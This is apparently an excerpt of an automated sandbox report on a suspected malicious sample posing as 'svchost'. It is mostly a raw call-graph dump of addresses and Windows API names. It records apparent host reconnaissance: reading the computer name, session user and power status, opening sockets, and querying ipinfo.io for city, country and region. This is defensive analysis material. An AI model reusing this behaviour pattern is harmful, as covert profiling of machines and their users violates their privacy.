execution_graph: raw node and edge data of the interactive execution graph (not reproduced here). The function nodes in the graph are labelled with the following API calls: calloc, malloc, realloc, free, memset, memcpy, memcpy_s, fflush, _errno, strtol, isspace, _invalid_parameter_noinfo, WSAStartup, WSASetLastError, getaddrinfo, freeaddrinfo, CreateSemaphoreA, CloseHandle, InitializeCriticalSection, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, RtlPcToFileHeader, RaiseException, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, Concurrency::details::SchedulerProxy::DeleteThis and Concurrency::cancel_current_task.
126714->126862 126715 7ffa2cef6f97 126721 7ffa2cef7009 free 126715->126721 126727 7ffa2cef701b 126715->126727 126723 7ffa2cef338c 126716->126723 126724 7ffa2cef6c13 malloc 126717->126724 126733 7ffa2cef6c7d 126717->126733 126718 7ffa2cef6e2a free 126731 7ffa2cef6da5 126718->126731 126719 7ffa2cef6f2f 126730 7ffa2cef6f9e 126719->126730 126738 7ffa2cef6f99 126719->126738 126739 7ffa2cef6f3d 126719->126739 126864 7ffa2cef2860 30 API calls Concurrency::details::SchedulerProxy::DeleteThis 126721->126864 126722 7ffa2cef6d4b 126722->126714 126722->126731 126723->126679 126847 7ffa2cef68e0 126723->126847 126725 7ffa2cef6c46 126724->126725 126726 7ffa2cef6c33 memcpy 126724->126726 126725->126717 126725->126733 126725->126824 126726->126725 126727->126713 126736 7ffa2cef703e free _strdup 126727->126736 126742 7ffa2cef705b 126727->126742 126729 7ffa2cef6cd2 malloc 126734 7ffa2cef6cf8 memcpy 126729->126734 126735 7ffa2cef6d0b 126729->126735 126863 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126730->126863 126731->126718 126732 7ffa2cef6e54 _strdup 126731->126732 126740 7ffa2cef6dff isalpha 126731->126740 126743 7ffa2cef6e7d 126731->126743 126732->126731 126732->126824 126733->126714 126733->126722 126733->126729 126733->126731 126734->126735 126735->126733 126746 7ffa2cef6d44 126735->126746 126735->126824 126736->126742 126736->126824 126737 7ffa2cef6ec3 malloc 126744 7ffa2cef6ef6 126737->126744 126745 7ffa2cef6ee3 memcpy 126737->126745 126738->126715 126738->126730 126739->126715 126747 7ffa2cef6f60 _strdup 126739->126747 126740->126731 126748 7ffa2cef707f memset SHGetFolderPathA 126742->126748 126753 7ffa2cef7190 126742->126753 126761 7ffa2cef7119 126742->126761 126743->126715 126743->126719 126743->126737 126744->126719 126744->126743 126744->126824 126745->126744 126746->126714 126746->126722 126747->126739 126747->126824 126750 7ffa2cef70b1 126748->126750 126748->126761 126749 7ffa2cef73b6 126751 7ffa2cef74c9 _strdup 126749->126751 126766 
7ffa2cef73d8 126749->126766 126865 7ffa2cf11830 126750->126865 126754 7ffa2cef73f5 126751->126754 126751->126824 126753->126749 126756 7ffa2cef71df malloc 126753->126756 126759 7ffa2cef75c1 _strdup 126754->126759 126776 7ffa2cef74fd 126754->126776 126758 7ffa2cef7203 memcpy 126756->126758 126756->126824 126757 7ffa2cef70f1 126760 7ffa2cf11830 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 126757->126760 126821 7ffa2cef722a 126758->126821 126767 7ffa2cef7514 126759->126767 126759->126824 126760->126761 126761->126753 126868 7ffa2cefa9f0 90 API calls Concurrency::details::SchedulerProxy::DeleteThis 126761->126868 126762 7ffa2cef73fa 126869 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126762->126869 126763 7ffa2cef7264 strcmp 126763->126821 126765 7ffa2cef74a7 126871 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126765->126871 126766->126754 126766->126765 126770 7ffa2cef7615 strcmp 126767->126770 126775 7ffa2cef7646 126767->126775 126774 7ffa2cef7628 126770->126774 126770->126775 126771 7ffa2cef77e1 126773 7ffa2cef7889 _strdup 126771->126773 126800 7ffa2cef7808 126771->126800 126771->126824 126772 7ffa2cef7413 free 126772->126713 126781 7ffa2cef7825 126773->126781 126773->126824 126873 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126774->126873 126777 7ffa2cef76e3 126775->126777 126874 7ffa2cf139e0 isupper tolower isupper tolower 126775->126874 126776->126767 126786 7ffa2cef7576 strcmp 126776->126786 126782 7ffa2cef7779 126777->126782 126879 7ffa2cf139e0 isupper tolower isupper tolower 126777->126879 126778 7ffa2cef739f free 126778->126749 126778->126753 126785 7ffa2cef7975 _strdup 126781->126785 126808 7ffa2cef78b6 126781->126808 126782->126771 126782->126782 126884 7ffa2cf139e0 isupper tolower isupper tolower 126782->126884 126784 7ffa2cef767d 126784->126777 126875 7ffa2cf139e0 isupper tolower isupper tolower 126784->126875 126790 7ffa2cef798e 126785->126790 
126785->126824 126786->126767 126787 7ffa2cef7589 strcmp 126786->126787 126787->126767 126791 7ffa2cef759c 126787->126791 126788 7ffa2cef72fa strcmp 126788->126821 126789 7ffa2cef7713 126789->126782 126880 7ffa2cf139e0 isupper tolower isupper tolower 126789->126880 126798 7ffa2cef7a01 strcmp 126790->126798 126819 7ffa2cef79c3 126790->126819 126872 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126791->126872 126795 7ffa2cef7690 126795->126777 126876 7ffa2cf139e0 isupper tolower isupper tolower 126795->126876 126796 7ffa2cef7726 126796->126782 126881 7ffa2cf139e0 isupper tolower isupper tolower 126796->126881 126797 7ffa2cef742a 126870 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126797->126870 126803 7ffa2cef7a1d strcmp 126798->126803 126798->126819 126799 7ffa2cef7867 126887 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126799->126887 126800->126781 126800->126799 126803->126819 126829 7ffa2cef7a3c 126803->126829 126805 7ffa2cef77bf 126805->126771 126885 7ffa2cf139e0 isupper tolower isupper tolower 126805->126885 126807 7ffa2cef7953 126889 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126807->126889 126808->126807 126809 7ffa2cef78d5 126808->126809 126809->126790 126813 7ffa2cef7935 126809->126813 126811 7ffa2cef76a3 126811->126777 126877 7ffa2cf139e0 isupper tolower isupper tolower 126811->126877 126812 7ffa2cef744a free 126812->126713 126888 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126813->126888 126815 7ffa2cef7739 126815->126782 126882 7ffa2cf139e0 isupper tolower isupper tolower 126815->126882 126816 7ffa2cef79f9 126846 7ffa2cef7b79 126816->126846 126891 7ffa2cf11750 RAND_bytes 126816->126891 126819->126816 126820 7ffa2cef7c0d 126819->126820 126819->126846 126893 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126820->126893 126821->126762 126821->126763 126821->126778 126821->126788 
126821->126797 126823 7ffa2cef77d2 126823->126824 126886 7ffa2cf139e0 isupper tolower isupper tolower 126823->126886 126895 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126824->126895 126825 7ffa2cef7c65 free 126894 7ffa2cf14980 39 API calls Concurrency::details::SchedulerProxy::DeleteThis 126825->126894 126828 7ffa2cef76b6 126828->126777 126834 7ffa2cef76ba 126828->126834 126829->126819 126835 7ffa2cef7aa2 strcmp 126829->126835 126833 7ffa2cef774c 126833->126782 126839 7ffa2cef7750 126833->126839 126878 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126834->126878 126835->126819 126836 7ffa2cef7ac4 126835->126836 126890 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126836->126890 126837 7ffa2cef7c74 126843 7ffa2cef7c7b _strdup 126837->126843 126838 7ffa2cef7b31 126838->126846 126892 7ffa2cf132e0 GetSystemTimePreciseAsFileTime 126838->126892 126883 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126839->126883 126843->126713 126843->126824 126845 7ffa2cef7b51 _getpid 126845->126846 126846->126713 126846->126825 126848 7ffa2cef691d 126847->126848 126851 7ffa2cef68ee 126847->126851 126848->126679 126849 7ffa2cef6913 126856 7ffa2cef6981 126849->126856 126911 7ffa2cef63c0 10 API calls 126849->126911 126851->126849 126852 7ffa2cef6900 126851->126852 126853 7ffa2cef692f 126851->126853 126910 7ffa2cf0c210 free realloc memcpy free Concurrency::details::SchedulerProxy::DeleteThis 126852->126910 126904 7ffa2cef34c0 126853->126904 126856->126679 126858 7ffa2cefa1ce 126857->126858 126858->126693 126860->126699 126861->126702 126862->126713 126863->126713 126864->126727 126896 7ffa2cf11db0 _errno 126865->126896 126868->126761 126869->126772 126870->126812 126871->126713 126872->126713 126873->126713 126874->126784 126875->126795 126876->126811 126877->126828 126878->126713 126879->126789 126880->126796 126881->126815 126882->126833 126883->126713 126884->126805 
126885->126823 126886->126771 126887->126713 126888->126713 126889->126713 126890->126713 126891->126838 126892->126845 126893->126713 126894->126837 126895->126713 126900 7ffa2cf11df7 126896->126900 126903 7ffa2cf123fc 126896->126903 126897 7ffa2cf16230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 126898 7ffa2cef70cf free malloc 126897->126898 126898->126757 126898->126824 126899 7ffa2cf11e46 126899->126900 126901 7ffa2cf12670 fwrite fwrite Concurrency::details::SchedulerProxy::DeleteThis 126899->126901 126899->126903 126900->126899 126902 7ffa2cf123fe _errno 126900->126902 126900->126903 126901->126899 126902->126903 126903->126897 126905 7ffa2cef4dae 126904->126905 126908 7ffa2cef3525 126904->126908 126906 7ffa2cf16230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 126905->126906 126907 7ffa2cef4dc9 126906->126907 126907->126849 126908->126905 126912 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126908->126912 126910->126849 126911->126848 126912->126905 126913 7ffa417ebfa0 126917 7ffa417ebfba 126913->126917 126915 7ffa417ec212 126918 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126915->126918 126919 7ffa417ec34e 126915->126919 126916 7ffa417ec1eb 126917->126916 127083 7ffa41866d18 126917->127083 126920 7ffa417ec375 126918->126920 126921 7ffa417ed720 105 API calls 126920->126921 126922 7ffa417ec3b7 126921->126922 126923 7ffa417e5f40 104 API calls 126922->126923 126924 7ffa417ec3c9 126923->126924 126925 7ffa417ec418 126924->126925 126927 7ffa417ed525 126924->126927 126926 7ffa417eed60 148 API calls 126925->126926 126928 7ffa417ec42a 126926->126928 126929 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126927->126929 126930 7ffa417e5f40 104 API calls 126928->126930 126931 7ffa417ed52a 126929->126931 126932 7ffa417ec439 126930->126932 126934 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126931->126934 126932->126931 126933 7ffa417ec481 GetSystemPowerStatus 
126932->126933 126935 7ffa417ec47c 126932->126935 126936 7ffa417ec4a6 126933->126936 126937 7ffa417ec4b1 WTSGetActiveConsoleSessionId 126933->126937 126940 7ffa417ed530 126934->126940 126935->126933 126936->126937 126938 7ffa417ec4c6 WTSQuerySessionInformationW 126937->126938 126939 7ffa417ec5df 126937->126939 126938->126939 126941 7ffa417ec502 126938->126941 126942 7ffa417cacf0 104 API calls 126939->126942 126943 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126940->126943 126946 7ffa417cacf0 104 API calls 126941->126946 126963 7ffa417ec5b6 126942->126963 126944 7ffa417ed536 126943->126944 126949 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126944->126949 126945 7ffa417e5f40 104 API calls 126948 7ffa417ec62b 126945->126948 126947 7ffa417ec547 WTSFreeMemory 126946->126947 126951 7ffa417ec561 126947->126951 126947->126963 126950 7ffa417ec673 GetComputerNameW 126948->126950 126954 7ffa417ed58a 126948->126954 126952 7ffa417ed53c 126949->126952 126957 7ffa417ec6af 126950->126957 126953 7ffa417edf80 139 API calls 126951->126953 126956 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126952->126956 126955 7ffa417ec56e 126953->126955 126958 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126954->126958 126955->126940 126955->126963 126959 7ffa417ed542 126956->126959 126960 7ffa417cacf0 104 API calls 126957->126960 126962 7ffa417ed590 126958->126962 126965 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126959->126965 126961 7ffa417ec6f1 126960->126961 126964 7ffa417e5f40 104 API calls 126961->126964 126963->126945 126967 7ffa417ec708 126964->126967 126966 7ffa417ed548 126965->126966 126968 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126966->126968 126967->126954 126969 7ffa417edc90 110 API calls 126967->126969 126970 7ffa417ed54e 126968->126970 126971 7ffa417ec75d 126969->126971 126973 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126970->126973 126972 7ffa417e5f40 
104 API calls 126971->126972 126974 7ffa417ec76f 126972->126974 126975 7ffa417ed554 126973->126975 126974->126944 126976 7ffa417ec7b2 126974->126976 126979 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126975->126979 126977 7ffa417ed5a0 106 API calls 126976->126977 126978 7ffa417ec7c4 126977->126978 126980 7ffa417e5f40 104 API calls 126978->126980 126981 7ffa417ed55a 126979->126981 126982 7ffa417ec7d3 126980->126982 126984 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126981->126984 126982->126952 126983 7ffa417ec816 126982->126983 126985 7ffa417cd210 std::_Throw_Cpp_error 104 API calls 126983->126985 126986 7ffa417ed560 126984->126986 126987 7ffa417ec914 126985->126987 126989 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126986->126989 126988 7ffa417e5f40 104 API calls 126987->126988 126990 7ffa417ec928 126988->126990 126991 7ffa417ed566 126989->126991 126990->126959 126992 7ffa417ec96b 126990->126992 126993 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126991->126993 126994 7ffa417c53f0 std::_Throw_Cpp_error 104 API calls 126992->126994 126995 7ffa417ed56c 126993->126995 126996 7ffa417ec998 126994->126996 126998 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126995->126998 126997 7ffa417ea8f0 112 API calls 126996->126997 126999 7ffa417ec9ab 126997->126999 127000 7ffa417ed572 126998->127000 126999->126966 127001 7ffa417ec9e4 126999->127001 127005 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 127000->127005 127002 7ffa417ecb95 127001->127002 127003 7ffa417eca0a 127001->127003 127004 7ffa417f01b0 112 API calls 127002->127004 127006 7ffa417c5740 106 API calls 127003->127006 127007 7ffa417ecbb7 127004->127007 127008 7ffa417ed578 127005->127008 127009 7ffa417eca1f 127006->127009 127010 7ffa417c53f0 std::_Throw_Cpp_error 104 API calls 127007->127010 127013 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 127008->127013 127011 7ffa417cd210 std::_Throw_Cpp_error 104 
API calls 127009->127011 127012 7ffa417ecbed 127010->127012 127014 7ffa417ecacf 127011->127014 127015 7ffa417f1470 112 API calls 127012->127015 127016 7ffa417ed57e 127013->127016 127017 7ffa417eab30 113 API calls 127014->127017 127018 7ffa417ecc02 127015->127018 127021 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 127016->127021 127019 7ffa417ecae2 127017->127019 127020 7ffa417f43f0 104 API calls 127018->127020 127019->126970 127022 7ffa417ecb26 127019->127022 127023 7ffa417ecc45 127020->127023 127024 7ffa417ed584 127021->127024 127022->126975 127027 7ffa417ecb8b 127022->127027 127025 7ffa417ecc51 127023->127025 127026 7ffa417ecc7a MultiByteToWideChar 127023->127026 127028 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 127024->127028 127032 7ffa417e5f40 104 API calls 127025->127032 127030 7ffa417cabc0 104 API calls 127026->127030 127027->126954 127029 7ffa417ed4fb 127027->127029 127028->126954 127033 7ffa418518b0 DName::DName 8 API calls 127029->127033 127031 7ffa417eccde MultiByteToWideChar 127030->127031 127031->127025 127034 7ffa417ecd64 127032->127034 127035 7ffa417ed510 127033->127035 127034->126981 127037 7ffa417ecda7 127034->127037 127036 7ffa417ecdeb 127038 7ffa417c53f0 std::_Throw_Cpp_error 104 API calls 127036->127038 127037->126986 127037->127036 127039 7ffa417ece25 127038->127039 127040 7ffa417f1470 112 API calls 127039->127040 127041 7ffa417ece3a 127040->127041 127042 7ffa417f43f0 104 API calls 127041->127042 127043 7ffa417ece7d 127042->127043 127044 7ffa417ece89 127043->127044 127045 7ffa417eceb2 MultiByteToWideChar 127043->127045 127048 7ffa417e5f40 104 API calls 127044->127048 127046 7ffa417cabc0 104 API calls 127045->127046 127047 7ffa417ecf16 MultiByteToWideChar 127046->127047 127047->127044 127049 7ffa417ecf9c 127048->127049 127049->126991 127050 7ffa417ecfdf 127049->127050 127050->126995 127051 7ffa417ed023 127050->127051 127052 7ffa417c53f0 std::_Throw_Cpp_error 104 API calls 127051->127052 127053 7ffa417ed05d 
127052->127053 127054 7ffa417f1470 112 API calls 127053->127054 127055 7ffa417ed072 127054->127055 127056 7ffa417f43f0 104 API calls 127055->127056 127057 7ffa417ed0b5 127056->127057 127058 7ffa417ed0c1 127057->127058 127059 7ffa417ed0ea MultiByteToWideChar 127057->127059 127062 7ffa417e5f40 104 API calls 127058->127062 127060 7ffa417cabc0 104 API calls 127059->127060 127061 7ffa417ed14e MultiByteToWideChar 127060->127061 127061->127058 127063 7ffa417ed1d4 127062->127063 127063->127000 127065 7ffa417ed217 127063->127065 127064 7ffa417ed25b 127066 7ffa417c53f0 std::_Throw_Cpp_error 104 API calls 127064->127066 127065->127008 127065->127064 127067 7ffa417ed295 127066->127067 127068 7ffa417f1470 112 API calls 127067->127068 127069 7ffa417ed2aa 127068->127069 127070 7ffa417f43f0 104 API calls 127069->127070 127071 7ffa417ed2ed 127070->127071 127072 7ffa417ed2f9 127071->127072 127073 7ffa417ed322 MultiByteToWideChar 127071->127073 127076 7ffa417e5f40 104 API calls 127072->127076 127074 7ffa417cabc0 104 API calls 127073->127074 127075 7ffa417ed386 MultiByteToWideChar 127074->127075 127075->127072 127077 7ffa417ed40c 127076->127077 127077->127016 127078 7ffa417ed44f 127077->127078 127078->127024 127079 7ffa417ed493 127078->127079 127080 7ffa417efa30 110 API calls 127079->127080 127081 7ffa417ed4a6 127080->127081 127082 7ffa417efba0 112 API calls 127081->127082 127082->127027 127088 7ffa41866ba4 102 API calls _invalid_parameter_noinfo 127083->127088 127085 7ffa41866d31 127089 7ffa41866d48 17 API calls __std_fs_directory_iterator_open 127085->127089 127088->127085 127090 7ffa417eab00 127091 7ffa417eab1f 127090->127091 127092 7ffa417eab0d curl_global_init 127090->127092 127092->127091 127093 7ffa417e8720 127094 7ffa417e878a memcpy_s 127093->127094 127115 7ffa4182fb00 127094->127115 127096 7ffa417e879e 127097 7ffa4182fb00 104 API calls 127096->127097 127098 7ffa417e87e6 127097->127098 127137 7ffa41831b20 127098->127137 127100 7ffa417e8833 127101 7ffa418310e0 112 API calls 
127100->127101 127102 7ffa417e887b 127101->127102 127103 7ffa418518d8 std::_Facet_Register 104 API calls 127102->127103 127104 7ffa417e88a4 memcpy_s 127103->127104 127105 7ffa418518d8 std::_Facet_Register 104 API calls 127104->127105 127106 7ffa417e88c6 127105->127106 127107 7ffa4182fb00 104 API calls 127106->127107 127108 7ffa417e88e2 127107->127108 127109 7ffa41831f60 121 API calls 127108->127109 127110 7ffa417e8911 127109->127110 127111 7ffa417e84f0 112 API calls 127110->127111 127112 7ffa417e892a 127111->127112 127113 7ffa418518b0 DName::DName 8 API calls 127112->127113 127114 7ffa417e8a01 127113->127114 127116 7ffa4182fb47 127115->127116 127119 7ffa4182fb22 127115->127119 127141 7ffa418518b0 127116->127141 127119->127116 127120 7ffa4182fb95 127119->127120 127121 7ffa4182fb63 127119->127121 127153 7ffa417c53a0 104 API calls std::_Throw_Cpp_error 127120->127153 127150 7ffa417c53a0 104 API calls std::_Throw_Cpp_error 127121->127150 127124 7ffa4182fb74 127151 7ffa41830190 104 API calls 127124->127151 127125 7ffa4182fba7 127154 7ffa41830190 104 API calls 127125->127154 127128 7ffa4182fb84 127152 7ffa41853f98 RtlPcToFileHeader RaiseException 127128->127152 127129 7ffa4182fbb7 127155 7ffa41853f98 RtlPcToFileHeader RaiseException 127129->127155 127132 7ffa4182fbc8 127156 7ffa4185397c 102 API calls __std_exception_copy 127132->127156 127134 7ffa4182fc02 127157 7ffa417c6990 127134->127157 127136 7ffa4182fc20 127136->127096 127138 7ffa41831b37 127137->127138 127198 7ffa417e9530 112 API calls 127138->127198 127140 7ffa41831b42 127142 7ffa418518b9 127141->127142 127143 7ffa4182fb5a 127142->127143 127144 7ffa418527a4 IsProcessorFeaturePresent 127142->127144 127143->127096 127145 7ffa418527bc 127144->127145 127171 7ffa4185299c RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 127145->127171 127147 7ffa418527cf 127172 7ffa41852770 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 127147->127172 127150->127124 127151->127128 
127152->127120 127153->127125 127154->127129 127155->127132 127156->127134 127158 7ffa417c69be 127157->127158 127160 7ffa417c6a0a 127158->127160 127163 7ffa417c6a62 127158->127163 127165 7ffa417c69da ctype 127158->127165 127169 7ffa417c6a9d 127158->127169 127170 7ffa417c6a97 127160->127170 127173 7ffa418518d8 127160->127173 127164 7ffa418518d8 std::_Facet_Register 104 API calls 127163->127164 127164->127165 127165->127136 127167 7ffa417c6a20 127167->127165 127168 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 127167->127168 127168->127170 127183 7ffa417c2d20 127169->127183 127182 7ffa417c2c80 104 API calls 2 library calls 127170->127182 127171->127147 127175 7ffa418518e3 127173->127175 127174 7ffa418518fc 127174->127167 127175->127174 127177 7ffa41851902 127175->127177 127186 7ffa418711a0 127175->127186 127178 7ffa4185190d 127177->127178 127189 7ffa4184eeb8 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 127177->127189 127190 7ffa417c2c80 104 API calls 2 library calls 127178->127190 127181 7ffa41851913 std::_Facet_Register 127181->127167 127182->127169 127197 7ffa4184ef1c 104 API calls 2 library calls 127183->127197 127191 7ffa418711f0 127186->127191 127188 7ffa418711b2 127188->127175 127190->127181 127196 7ffa41870498 EnterCriticalSection 127191->127196 127193 7ffa418711fd 127194 7ffa418704ec __crtLCMapStringW LeaveCriticalSection 127193->127194 127195 7ffa4187121e 127194->127195 127195->127188 127198->127140 127199 7ffa4187af38 127200 7ffa4187af68 127199->127200 127207 7ffa4187ad68 127200->127207 127203 7ffa4187afa7 127205 7ffa4187afbc 127203->127205 127219 7ffa418629f0 102 API calls 2 library calls 127203->127219 127208 7ffa4187ad91 127207->127208 127209 7ffa4187adbf 127207->127209 127208->127203 127218 7ffa418629f0 102 API calls 2 library calls 127208->127218 127210 7ffa4187add8 127209->127210 127212 7ffa4187ae2f 127209->127212 127221 7ffa41866c40 102 API calls 2 library calls 127210->127221 127220 7ffa418838cc 
EnterCriticalSection 127212->127220 127214 7ffa4187ae36 127215 7ffa4187ae88 _fread_nolock 102 API calls 127214->127215 127216 7ffa4187ae4d 127214->127216 127215->127216 127217 7ffa418839b4 __std_fs_directory_iterator_open LeaveCriticalSection 127216->127217 127217->127208 127218->127203 127219->127205 127221->127208 127222 7ffa417e5300 127223 7ffa417e5318 127222->127223 127227 7ffa417e5324 ctype 127222->127227 127224 7ffa417e5335 ctype 127225 7ffa417e546e 127225->127224 127229 7ffa418693b8 127225->127229 127226 7ffa418693b8 _fread_nolock 102 API calls 127226->127227 127227->127224 127227->127225 127227->127226 127232 7ffa418693d8 127229->127232 127233 7ffa418693d0 127232->127233 127234 7ffa41869402 127232->127234 127233->127224 127234->127233 127235 7ffa41869411 memcpy_s 127234->127235 127236 7ffa4186944e 127234->127236 127246 7ffa41866668 13 API calls memcpy_s 127235->127246 127245 7ffa418688b0 EnterCriticalSection 127236->127245 127238 7ffa41869456 127240 7ffa4186914c _fread_nolock 102 API calls 127238->127240 127242 7ffa4186946d 127240->127242 127241 7ffa41869426 127247 7ffa41866cf8 102 API calls _invalid_parameter_noinfo 127241->127247 127244 7ffa418688bc __std_fs_directory_iterator_open LeaveCriticalSection 127242->127244 127244->127233 127246->127241 127247->127233 127248 7ffa417f6afb 127299 7ffa4186d450 127248->127299 127250 7ffa417f6b2d 127251 7ffa417f6b53 127250->127251 127252 7ffa4186d450 110 API calls 127250->127252 127253 7ffa417f8330 112 API calls 127251->127253 127252->127251 127254 7ffa417f6b6b 127253->127254 127255 7ffa417f2270 112 API calls 127254->127255 127256 7ffa417f6b78 127255->127256 127257 7ffa417f6b8d 127256->127257 127258 7ffa417f2270 112 API calls 127256->127258 127259 7ffa417c53f0 std::_Throw_Cpp_error 104 API calls 127257->127259 127258->127257 127260 7ffa417f6f68 127259->127260 127261 7ffa417f1a70 105 API calls 127260->127261 127262 7ffa417f6f80 127261->127262 127263 7ffa417f6130 105 API calls 127262->127263 127264 7ffa417f6fa6 
127263->127264 127265 7ffa417f1f90 105 API calls 127264->127265 127266 7ffa417f6fb6 127265->127266 127267 7ffa417f6fc5 127266->127267 127268 7ffa417f74b1 127266->127268 127269 7ffa417c67f0 102 API calls 127267->127269 127270 7ffa417efae0 102 API calls 127268->127270 127271 7ffa417f6fd1 __std_exception_destroy 127269->127271 127272 7ffa417f74be 127270->127272 127277 7ffa417c67f0 102 API calls 127271->127277 127273 7ffa41853f98 Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 127272->127273 127274 7ffa417f74cf 127273->127274 127275 7ffa417efae0 102 API calls 127274->127275 127276 7ffa417f74dd 127275->127276 127278 7ffa41853f98 Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 127276->127278 127279 7ffa417f6ffd 127277->127279 127280 7ffa417f74ee 127278->127280 127282 7ffa417c67f0 102 API calls 127279->127282 127281 7ffa417efae0 102 API calls 127280->127281 127283 7ffa417f74fc 127281->127283 127284 7ffa417f7008 127282->127284 127285 7ffa41853f98 Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 127283->127285 127287 7ffa417f17c0 102 API calls 127284->127287 127286 7ffa417f750d 127285->127286 127288 7ffa417efae0 102 API calls 127286->127288 127289 7ffa417f73cf 127287->127289 127290 7ffa417f751b 127288->127290 127291 7ffa418518b0 DName::DName 8 API calls 127289->127291 127292 7ffa41853f98 Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 127290->127292 127293 7ffa417f73e2 127291->127293 127294 7ffa417f752c 127292->127294 127295 7ffa417efae0 102 API calls 127294->127295 127296 7ffa417f753a 127295->127296 127297 7ffa41853f98 Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 127296->127297 127298 7ffa417f754b 127297->127298 127304 7ffa4187b284 102 API calls 2 library calls 127299->127304 127302 7ffa4186d47c __std_fs_directory_iterator_open 127305 7ffa4186d2a8 110 API calls __std_fs_directory_iterator_open 127302->127305 127304->127302 127306 7ffa2cef3bc7 127307 7ffa2cef3bd6 127306->127307 
            • Call-graph rendering omitted (this excerpt begins mid-graph). Recoverable content: a socket-setup routine at 0x7ffa2cef3c68..0x7ffa2cef40b3 in module 0x7FFA2CEF0000 (free, _strdup, socket, WSAGetLastError, setsockopt, ioctlsocket, connect, strtol, _errno, isspace) whose error paths run through Concurrency::details::SchedulerProxy::DeleteThis helpers at 7ffa2cf0c450, 7ffa2cf02d70, 7ffa2cefa920, 7ffa2cefafa0, 7ffa2cef6990, 7ffa2cf16230; a lock-protected getenv wrapper at 0x7ffa2cf02e10 (GetLastError, InitializeCriticalSection, EnterCriticalSection, Sleep, getenv, LeaveCriticalSection, SetLastError); a cleanup routine at 0x64943aa0 (__iob_func, three CloseHandle calls via 0x64943070); and statically linked CRT/STL code in the svchost module 0x7FFA417C0000 at 0x7ffa417e50b0, 0x7ffa417e6430 and 0x7ffa417e6330 (DName::DName, std::_Facet_Register, std::_Lockit, std::_Throw_Cpp_error, ctype, __std_fs_directory_iterator_open, __crtLCMapStringW, __vcrt_FlsGetValue, memcpy_s, _invalid_parameter_noinfo, _invalid_parameter_noinfo_noreturn at 7ffa41866d18, RtlPcToFileHeader/RaiseException at 7ffa41853f98).
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide$Session$ActiveComputerConcurrency::cancel_current_taskConsoleCreateFactoryFreeInformationMemoryNamePowerQueryStatusSystem
            • String ID: )$045012$G$N/A$N/A$N/A$N/A$N/A$city$country$hardware_manager::download_json_error: {}$https://ipinfo.io/json$region$user${}-{}
            • API String ID: 1169071619-3347492713
            • Opcode ID: da2ba496f3eb7d9b46214e740186fd5aeb5a1fd6f66b29666b694183b68a7d38
